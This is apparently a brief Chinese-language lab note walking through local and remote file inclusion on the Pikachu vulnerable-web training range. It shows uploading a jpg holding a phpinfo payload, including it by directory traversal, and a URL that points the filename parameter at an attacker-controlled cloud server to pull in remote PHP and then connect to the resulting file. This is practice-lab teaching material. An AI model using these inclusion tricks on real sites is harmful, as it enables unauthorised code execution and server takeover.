本地文件包含
先上传一个jpg文件,内容写上<?php phpinfo();?>
上传成功并且知晓了文件的路径
返回本地上传,并../返回上级目录
可以看到我们的php语句已经生效
远程文件包含
在云服务器上创建一个php文件
然后打开pikachu的远程文件包含靶场,随便选一个提交
在filename处修改为云服务器的目标地址
127.0.0.1/pika/vul/fileinclude/fi_remote.php?filename=http://云服务器IP2.txt&submit=提交查询
可以看到生成的php文件
然后进行连接